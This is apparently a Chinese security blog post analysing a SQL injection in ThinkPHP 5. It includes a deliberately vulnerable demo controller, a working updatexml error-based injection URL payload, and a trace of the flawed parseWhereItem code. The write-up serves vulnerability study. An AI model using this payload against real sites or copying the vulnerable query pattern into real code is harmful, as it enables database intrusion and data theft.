HacKerQWQ的博客空间

TP5SQL注入漏洞分析TP5全版本

ThinkPHP 漏洞分析 代码审计
Word count: 442Reading time: 1 min
2021/06/26 Share

配置

通过以下命令获取测试环境代码:

1
composer create-project --prefer-dist topthink/think=5.0.10 tpdemo

composer.json 文件的 require 字段设置成如下:

1
2
3
4
"require": {
    "php": ">=5.4.0",
    "topthink/framework": "5.0.10"
},

然后执行 composer update ,并将 application/index/controller/Index.php 文件代码设置如下:

1
2
3
4
5
6
7
8
9
10
11
12
<?php
namespace app\index\controller;

class Index
{
    public function index()
    {
        $username = request()->get('username');
        $result = db('users')->where('username','exp',$username)->select();
        return 'select success';
    }
}

config/database.php 文件中配置数据库相关信息,并开启 config/app.php 中的 app_debugapp_trace 。创建数据库信息如下:

1
2
3
4
5
6
7
create database tpdemo;
use tpdemo;
create table users(
	id int primary key auto_increment,
	username varchar(50) not null
);
insert into users(id,username) values(1,'mochazz');

漏洞简介

由于parseWhereItem方法中,对$whereStr直接进行的sql语句的拼接,造成了sql注入

payload

1
http://localhost/index.php/index/index?username=)='1' union select updatexml(1,concat(0x7,user(),0x7e),1

20210626212321

漏洞分析

20210626212413
首先进行参数的传入,然后先进入where方法
20210626212820
Query.phpwhereparseWhereExp会分析查询表达式,并使得$option具有如下值
20210626213152
然后进入thinkphp/library/think/db/Query.phpselect方法调用
20210626213341
这里的builderthinkphp/library/think/db/Builder.phpBuilder类,Builderselect方法用于拼接sql语句
20210626213639
上面代码用于对sql语句模板进行变量填充,问题出现在parseWhere方法中,即对%WHERE%进行填充出现问题,继续跟进
20210626214122
parseWhere方法又调用了parseWhereItem子方法进行SQL语句拼接,跟进
20210626215225
在此处又将值带入parseWhereItem拼接
20210626214832
由于$key值是EXP,进入该分支,将sql语句拼接成我们构造的sql语句,最终造成sql注入
20210626215007

总结

sql3

修复

由于官方不认为这是个漏洞,因此存在于整个TP5中

Author:HacKerQWQ

原文链接:https://hackerqwq.github.io/2021/06/26/TP5SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90TP5%E5%85%A8%E7%89%88%E6%9C%AC/

发表日期:June 26th 2021, 6:46:29 pm

更新日期:June 26th 2021, 10:27:13 pm

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. 配置
  2. 2. 漏洞简介
  3. 3. payload
  4. 4. 漏洞分析
  5. 5. 总结
  6. 6. 修复
Total : 163
2023
2022
2021
2020
ctf PHP反序列化 sql jwt 2021CISCN 文件上传 uncide欺骗 无列名注入 php反射类利用 2021红明谷 输入法取证 盲水印隐写 哈夫曼编码 流量分析 Android md5 shtml 2020CISCN png结构 CRC32 Crypto Java安全 intro 权限提升 Docker CVE Hash php_upload_progress_session hash长度拓展攻击 红蓝对抗 MySQL PHP代码审计 PHP 2021Nep 命令执行 PHP原生类 云函数 JAVA_WEB ThinkPHP 原型链污染 nodejs 源码泄露 SSTI 漏洞分析 渗透测试 代码审计 JAJA XML 漏洞 免杀 机器学习 XSS XXE 硬件安全 社工 编码漏洞 nginx常见文件位置 .htaccess利用 HTTP协议 内网渗透 横向移动 漏洞利用 metasploit 信息收集 CTF PHP伪协议 php pickle 逻辑漏洞 2019CISCN python 多线程 misc图像处理 Nginx LFI redis攻防 提权 C 代码执行 渗透 权限维持 bugs phar反序列化 变量覆盖漏洞 扫描软件 弱类型比较 Django rar伪加密 二维码 文件上传漏洞 文件包含 文件读取漏洞 无参数构造payload 神经网络 红队 SSRF url取反绕过 misc_zip create_function注入 零宽度字符